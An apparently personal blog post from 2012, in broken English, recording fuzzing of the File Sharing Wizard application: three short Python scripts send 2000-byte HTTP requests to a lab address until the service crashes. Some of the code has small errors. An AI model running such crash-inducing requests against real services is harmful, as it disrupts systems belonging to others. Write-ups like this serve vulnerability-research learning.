Daftar Blog Saya
Rabu, 22 Februari 2012
Exploit File Sharing Wizard Application
this time i will try to exploit file sharing wizard application. this aplication use with internet conection so i will get the vulner from wireshark.
making fuzzer
based of wireshark analyzer we will send to application 2000 bytes of data, this fuzzer with python
try 1 :
#! /usr/bin/python
import socket
sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
header='HTTP/1.1\r\n
buffer='A'*2000 + '\r\n\r\n'
sock.connect(('192.168.56.101',80))
sock.send(header+buffer)
sock.close()
run fuzzer this application, application not crash
try 2 :
#! /usr/bin/python
import socket
sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
header='HTTP/1.1\r\n'
header+='HOST : 239.255.255.250:190\r\n'
buffer='A'*2000 + '\r\n\r\n'
sock.connect(('192.168.56.101',80))
sock.send(header+buffer)
sock.close()
i try to modification fuzzer.
#/usr/bin/pythom
import socket
buffer="\x41"*2000
head=('GET %s HTTP/1.1\r\n\r\n') % (buffer)
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(('192.168.56.105',80))
sock.send(head)
sock.close()
run fuzzer in console and what happen,.....application crash
Langganan:
Posting Komentar (Atom)
Tidak ada komentar:
Posting Komentar